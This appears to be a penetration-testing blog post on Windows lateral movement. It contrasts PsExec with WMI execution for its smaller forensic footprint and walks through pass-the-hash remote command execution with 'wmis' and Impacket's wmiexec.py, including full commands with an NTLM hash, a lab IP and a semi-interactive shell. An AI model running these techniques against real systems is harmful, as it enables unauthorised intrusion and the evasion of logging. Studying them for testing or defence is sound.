PSEXEC has been a staple for Windows post exploitation pivoting and system administration for a long while. The basic premise of how all “psexec” tools work is:
- (Optional) Upload a service executable (PSEXECSVC.EXE in the case of SysInternal’s tool) to the ADMIN$ share
- Connect to the service manager on the remote host, and create a service based on either a local (to the remote system) executable or the uploaded one.
- Run the service
- Stop and delete the service and uploaded file pulling down the resulting output if any from the execution.
Now, as you can guess, the uploading of a file, creating, starting, stopping, and deletion of services create quite the logs and forensic evidence.
As you might imagine, thats not the best thing for us on the offensive side of infosec. Luckily big brother Microsoft provides another option, WMI (Windows Management Interface). I demonstrated the use of this in the past: HERE and HERE
The downside to using the WMIC directly is that you need a valid token or a valid password for it to work. Passing the hash didn’t used to be an available option.
That has changed with the “wmis” package on Kali Linux that incorporates the “Pass-the-Hash for 15 years toolkit”
(There is a slight problem where you have to play with it a bit to get it working on 64 bit Kali)
The other solution is supplied as an example in the Impacket library “wmiexec.py”. In my experience there are a few features that make it the better option.
- Installing it on a random VPS is dead simple and doesn’t need the Kali repos to get right, nor Debian/Ubuntu.
- It defaults to an “semi-interactive shell” which writes and reads output from the ADMIN$ shell by default. Something I would normally have to do manually with a bunch of tools
- As with the WMIS package, it allows you to just create a process without the ADMIN$ write/read.
Enough crazy talk here is an example usage of each:
WMIS
Usage:
1
2
3
4
5
6
7
8
9
10
11
|
root@wpad:~# wmis
Usage: [-?NPV] [-?|--help] [--usage] [-d|--debuglevel=DEBUGLEVEL] [--debug-stderr] [-s|--configfile=CONFIGFILE]
[--option=name=value] [-l|--log-basename=LOGFILEBASE] [--leak-report] [--leak-report-full]
[-R|--name-resolve=NAME-RESOLVE-ORDER] [-O|--socket-options=SOCKETOPTIONS] [-n|--netbiosname=NETBIOSNAME]
[-W|--workgroup=WORKGROUP] [--realm=REALM] [-i|--scope=SCOPE] [-m|--maxprotocol=MAXPROTOCOL]
[-U|--user=[DOMAIN\]USERNAME[%PASSWORD]] [-N|--no-pass] [--password=STRING] [-A|--authentication-file=FILE]
[-S|--signing=on|off|required] [-P|--machine-pass] [--simple-bind-dn=STRING] [-k|--kerberos=STRING]
[--use-security-mechanisms=STRING] [-V|--version]
//host
Example: wmis -U [domain/]adminuser%password //host cmd.exe /c dir c:\ > c:\windows\temp\output.txt
|
Example:
1
2
3
4
5
|
root@wpad:~# wmis -U administrator%aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 //172.16.102.141 calc.exe
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied NTLM HASH...
[wmi/wmis.c:172:main()] 1: calc.exe
NTSTATUS: NT_STATUS_OK - Success
|
wmiexec.py
Using a password, but with hashes you just tell it -hashes
:
Usage:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
root@wpad:~/impacket/examples# ./wmiexec.py
Impacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologies
usage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-hashes LMHASH:NTHASH]
target [command [command ...]]
positional arguments:
target [domain/][username[:password]@]<address>
command command to execute at the target. If empty it will
launch a semi-interactive shell
optional arguments:
-h, --help show this help message and exit
-share SHARE share where the output will be grabbed from (default
C$)
-nooutput whether or not to print the output (no SMB connection
created)
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
|
Example:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
root@wpad:~/impacket/examples# ./wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 administrator@172.16.102.141
Impacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologies
SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
C:\>dir
Volume in drive C has no label.
Volume Serial Number is 5CCA-B528
Directory of C:\
07/13/2009 11:20 PM <DIR> PerfLogs
10/07/2013 03:26 PM <DIR> Program Files
07/14/2009 01:08 AM <DIR> Program Files (x86)
04/25/2014 02:21 AM <DIR> Users
05/11/2014 03:39 PM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 52,884,389,888 bytes free
C:\>
|